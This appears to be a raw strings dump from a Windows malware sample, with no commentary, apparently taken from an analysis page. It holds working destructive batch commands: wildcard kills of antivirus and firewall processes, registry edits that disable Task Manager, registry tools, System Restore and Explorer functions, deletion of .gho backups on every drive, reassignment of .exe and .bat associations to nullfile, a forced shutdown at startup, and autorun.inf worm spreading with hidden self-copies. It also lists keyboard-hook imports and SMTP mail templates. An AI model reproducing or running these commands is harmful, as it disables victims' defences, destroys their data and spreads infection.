application/x-www-form-urlencoded</pre><pre>HTTP/1.1</pre><pre>http://</pre><pre>len = str.length; i < len; i) hash = (hash << 5) str.charCodeAt(i);</pre><pre>var t = QZONE.FormSender;</pre><pre>if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {</pre><pre>var a = QZFL.string.trim(fm.action);</pre><pre>a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();</pre><pre>fm.action = a</pre><pre>slear && del / f / s / q c:\slear.bat</pre><pre>c:\slear.bat</pre><pre>cmd.exe</pre><pre>c:\windows\system\shutdown.bat</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe</pre><pre>reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"</pre><pre>del :\forshotdown.cmd</pre><pre>shutdown -s -t 0 && del / f / s / q c:\slear.bat</pre><pre>c:\windows\system32\slear.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr</pre><pre>http://www.shafou.com</pre><pre>copy %0 %windir%\system32\cmd.bat</pre><pre>attrib %windir%\system32\cmd.bat r s h</pre><pre>%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul</pre><pre>%s% /im norton* /f >nul</pre><pre>%s% /im av* /f >nul</pre><pre>%s% /im fire* /f >nul</pre><pre>%s% /im anti* /f >nul</pre><pre>%s% /im spy* /f >nul</pre><pre>%s% /im bullguard /f >nul</pre><pre>%s% /im PersFw /f >nul</pre><pre>%s% /im KAV* /f >nul</pre><pre>%s% /im ZONEALARM /f >nul</pre><pre>%s% /im SAFEWEB /f >nul</pre><pre>%s% /im OUTPOST /f >nul</pre><pre>%s% /im nv* /f >nul</pre><pre>%s% /im nav* /f >nul</pre><pre>%s% /im F-* /f >nul</pre><pre>%s% /im ESAFE /f >nul</pre><pre>%s% /im cle /f >nul</pre><pre>%s% /im BLACKICE /f >nul</pre><pre>%s% /im def* /f >nul</pre><pre>%s% /im 360safe.exe /f >nul</pre><pre>REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD</pre><pre>REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d</pre><pre>REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d</pre><pre>for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul</pre><pre>echo @echo off >d:\setup.bat</pre><pre>!^.^ >>d:\setup.bat</pre><pre>echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\</pre><pre>\a.bat >>d:\setup.bat</pre><pre>echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat</pre><pre>/f >>d:\setup.bat</pre><pre>echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat</pre><pre>echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat</pre><pre>HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat</pre><pre>echo [windows] >> %windir%\win.ini</pre><pre>echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini</pre><pre>echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini</pre><pre>echo [boot] >> %windir%\system.ini</pre><pre>echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini</pre><pre>echo [AutoRun] >d:\autorun.inf</pre><pre>echo Open=setup.bat >>d:\autorun.inf</pre><pre>echo Open=system.bat >>d:\autorun.inf</pre><pre>attrib d:\autorun.inf r s h >>d:\setup.bat</pre><pre>attrib d:\setup.bat r s h >>d:\setup.bat</pre><pre>start d:\setup.bat /min >nul</pre><pre>echo @echo off >>C:\AUTOEXEC.BAT</pre><pre>echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d</pre><pre>C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT</pre><pre>echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d</pre><pre>REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d</pre><pre>/f >>C:\AUTOEXEC.BAT</pre><pre>REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat</pre><pre>echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT</pre><pre>copy %0 %systemroot%\windows.bat >nul</pre><pre>if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat</pre><pre>if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat</pre><pre>if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat</pre><pre>C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat</pre><pre>/f >>%windir%/system32/explorer.bat</pre><pre>echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %</pre><pre>windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat</pre><pre>echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %</pre><pre>windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat</pre><pre>echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat</pre><pre>attrib %windir%/system32/explorer.bat r s h%</pre><pre>attrib %systemroot%/windows.bat r s h</pre><pre>for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat</pre><pre>for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat</pre><pre>for %%c in (%alldrive%) do echo attrib system.bat r s h >>%%c:\system.bat</pre><pre>for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf</pre><pre>for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf</pre><pre>copy %0 d:\Program" "Files\run.bat</pre><pre>for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min</pre><pre>>>%%c:\system.bat</pre><pre>for %%c in (%alldrive%) do attrib autorun.inf r s h >>%%c:\system.bat</pre><pre>for %%c in (%alldrive%) do attrib %%c:\autorun.inf r s h >nul</pre><pre>for %%c in (%alldrive%) do attrib %%c:\system.bat r s h >nul</pre><pre>if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat</pre><pre>attrib d:\Program" "Files\run.bat r s h >nul</pre><pre>http://www.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun</pre><pre>SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind</pre><pre>SOFTWARE\360Safe\safemon\ExecAccess</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop</pre><pre>Software\Policies\Microsoft\Windows\System\DisableCMD</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu</pre><pre>Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders</pre><pre>assoc .exe=nullfile</pre><pre>assoc .reg=nullfile</pre><pre>assoc .bat=nullfile</pre><pre>assoc .cmd=nullfile</pre><pre>assoc .vbs=nullfile</pre><pre>assoc .txt=nullfile</pre><pre>assoc .com=nullfile</pre><pre>reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f</pre><pre>reg delete "HKEY_CLASSES_ROOT\bluestacks" /f</pre><pre>reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f</pre><pre>@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat</pre><pre>goto 22c:\slears.bat</pre><pre>.slear</pre><pre>d:\sleartest.exe</pre><pre>adm-music.com</pre><pre>O%u,%</pre><pre>J÷%</pre><pre>ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP</pre><pre>fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP</pre><pre>c:\windows\system32\</pre><pre>F%*.*f</pre><pre>CNotSupportedException</pre><pre>commctrl_DragListMsg</pre><pre>Afx:%x:%x:%x:%x:%x</pre><pre>Afx:%x:%x</pre><pre>COMCTL32.DLL</pre><pre>CCmdTarget</pre><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>iphlpapi.dll</pre><pre>SHLWAPI.dll</pre><pre>MPR.dll</pre><pre>VERSION.dll</pre><pre>WSOCK32.dll</pre><pre>.PAVCException@@</pre><pre>.PAVCNotSupportedException@@</pre><pre>.PAVCFileException@@</pre><pre>(*.prn)|*.prn|</pre><pre>(*.*)|*.*||</pre><pre>Shell32.dll</pre><pre>Mpr.dll</pre><pre>Advapi32.dll</pre><pre>User32.dll</pre><pre>Gdi32.dll</pre><pre>Kernel32.dll</pre><pre>(&07-034/)7 '</pre><pre>?? / %d]</pre><pre>%d / %d]</pre><pre>: %d]</pre><pre>(*.WAV;*.MID)|*.WAV;*.MID|WAV</pre><pre>(*.WAV)|*.WAV|MIDI</pre><pre>(*.MID)|*.MID|</pre><pre>(*.txt)|*.txt|</pre><pre>(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG</pre><pre>(*.JPG)|*.JPG|BMP</pre><pre>(*.BMP)|*.BMP|GIF</pre><pre>(*.GIF)|*.GIF|</pre><pre>(*.ICO)|*.ICO|</pre><pre>(*.CUR)|*.CUR|</pre><pre>%s:%d</pre><pre>windows</pre><pre>out.prn</pre><pre>%d.%d</pre><pre>%d / %d</pre><pre>%d/%d</pre><pre>Bogus message code %d</pre><pre>(%d-%d):</pre><pre>%ld%c</pre><pre>www.dywt.com.cn</pre><pre>%s <%s></pre><pre>Reply-To: %s</pre><pre>From: %s</pre><pre>To: %s</pre><pre>Subject: %s</pre><pre>Date: %s</pre><pre>Cc: %s</pre><pre>%a, %d %b %Y %H:%M:%S</pre><pre>SMTP</pre><pre>.PAVCObject@@</pre><pre>.PAVCSimpleException@@</pre><pre>.PAVCMemoryException@@</pre><pre>.?AVCNotSupportedException@@</pre><pre>.PAVCResourceException@@</pre><pre>.PAVCUserException@@</pre><pre>.?AVCCmdTarget@@</pre><pre>.?AVCCmdUI@@</pre><pre>.?AVCTestCmdUI@@</pre><pre>.PAVCArchiveException@@</pre><pre>zcÁ</pre><pre>c:\%original file name%.exe</pre><pre>#include "l.chs\afxres.rc" // Standard components</pre><pre>GetCPInfo</pre><pre>WinExec</pre><pre>GetProcessHeap</pre><pre>RegOpenKeyExA</pre><pre>RegCreateKeyA</pre><pre>RegDeleteKeyA</pre><pre>RegCreateKeyExA</pre><pre>RegCloseKey</pre><pre>GetViewportExtEx</pre><pre>ScaleViewportExtEx</pre><pre>SetViewportExtEx</pre><pre>OffsetViewportOrgEx</pre><pre>SetViewportOrgEx</pre><pre>GetViewportOrgEx</pre><pre>ShellExecuteA</pre><pre>GetKeyState</pre><pre>SetWindowsHookExA</pre><pre>GetKeyboardLayout</pre><pre>VkKeyScanExA</pre><pre>keybd_event</pre><pre>CreateDialogIndirectParamA</pre><pre>UnhookWindowsHookEx</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>(*.*)</pre></f></pre></f>